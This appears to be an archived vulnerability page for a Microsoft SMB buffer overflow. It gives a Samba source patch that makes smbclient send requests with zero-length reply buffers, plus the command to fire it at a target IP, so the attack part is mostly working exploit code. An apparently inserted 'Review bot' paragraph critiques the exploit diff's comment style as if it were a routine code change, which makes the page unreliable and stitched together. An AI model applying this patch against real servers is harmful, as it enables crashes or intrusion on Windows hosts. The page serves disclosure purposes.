Microsoft Network Share Provider SMB Request Buffer Overflow Vulnerability

A Samba patch which allows exploitation of this issue is available:

Patch for samba-latest.tar.gz

Exploit with:

smbclient -L <targetIP> -N

--------------------

--- samba-2.2.5.original/source/libsmb/clirap.c Tue Jun 18 21:13:44 2002
+++ samba-2.2.5.exploit/source/libsmb/clirap.c Fri Aug 16 22:17:45 2002
@@ -237,8 +237,10 @@
STR_TERMINATE | STR_CONVERT | STR_ASCII);

if (cli_api(cli,
- param, PTR_DIFF(p,param), 8, /* params, length, max */
- NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+// param, PTR_DIFF(p,param), 8, /* params, length, max */
+// NULL, 0, CLI_BUFFER_SIZE, /* data, length, max */
+ param, PTR_DIFF(p,param), 0,
+ NULL, 0, 0,
&rparam, &rprcnt, /* return params, return size */
&rdata, &rdrcnt /* return data, return size */
)) {
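
Review bot: in the cli_api call, the two added argument lines pass a bare 0 for both the maximum returned parameter size and the maximum returned data size (previously 8 and CLI_BUFFER_SIZE) with no explanation, and the original lines are left behind as "//" comments. Add a comment saying why the limits are zero, keep the "/* params, length, max */" annotations that the neighbouring argument lines carry, and delete the old lines instead of commenting them out, since the rest of this call uses "/* */" comments. The change is also unconditional, so every request sent through this call now advertises zero-length reply buffers. A server receiving such a request has to validate those two fields itself, and that server-side bounds check is what to confirm when testing a fix.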

--------------------

A binary exploit has also been released. This exploit code has not been tested by Symantec. As always, caution is advised when dealing with binary code received from unknown sources. Exploit credit is given to Zamolx3 <zamolx3@personal.ro>.

An exploit has been provided by Frederic Deletang <df@phear.org>.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


 

Copyright 2010, SecurityFocus